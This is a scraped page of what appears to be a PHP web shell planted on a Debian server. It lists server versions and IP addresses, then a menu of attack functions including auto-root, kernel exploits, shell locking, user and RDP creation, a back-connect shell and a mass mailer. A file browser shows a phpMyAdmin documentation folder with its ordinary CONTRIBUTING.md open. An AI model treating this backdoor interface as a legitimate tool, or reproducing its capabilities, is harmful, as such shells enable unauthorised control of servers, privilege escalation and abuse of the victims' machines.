Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 216.73.216.105
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
ifk
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
phpmyadmin /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxr-xr-x
html
[ DIR ]
drwxr-xr-x
CONTRIBUTING.md
1.62
KB
-rw-r--r--
NEWS.Debian.gz
411
B
-rw-r--r--
README
1.48
KB
-rw-r--r--
README.Debian.gz
2.12
KB
-rw-r--r--
TODO.Debian
47
B
-rw-r--r--
changelog.Debian.gz
21.63
KB
-rw-r--r--
changelog.gz
9.63
KB
-rw-r--r--
copyright
5.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CONTRIBUTING.md
# Contributing to phpMyAdmin As an open source project, phpMyAdmin welcomes contributions of many forms. ## Bug reporting We appreciate your effort to improve phpMyAdmin by submitting a bug report. Before doing so, please check the following things: 1. Check whether the bug you face **hasn't been already reported**. Duplicate reports takes us time, that we could be used to fix other bugs or make improvements. 2. Specify the phpMyAdmin, server, PHP, MySQL and browser information that may be helpful to fix the problem, especially exact **version numbers**. 3. If you got some error, please **describe what happened** and add error message. Reports like "I get error when I clicked on some link." are useless. 4. Provide easy steps to reproduce and if possible include your table structure (``SHOW CREATE TABLE `tbl_name```); if your problem implies specific data, attach a small export file for sample rows. 5. **Security problems** should not be reported here. See [our security page](https://www.phpmyadmin.net/security/). Thanks for your help! Please report [bugs on GitHub][1]. [1]: https://github.com/phpmyadmin/phpmyadmin/issues/new ## Patches submission Patches are welcome as [pull requests on GitHub][2]. Please include a Signed-off-by tag. Note that by submitting patches with the Signed-off-by tag, you are giving permission to license the patch as GPLv2-or-later. See [the DCO file][3] for details. [2]: https://github.com/phpmyadmin/phpmyadmin/pulls [3]: https://github.com/phpmyadmin/phpmyadmin/blob/master/DCO ## More information You can find more information on our website: https://www.phpmyadmin.net/contribute/
Close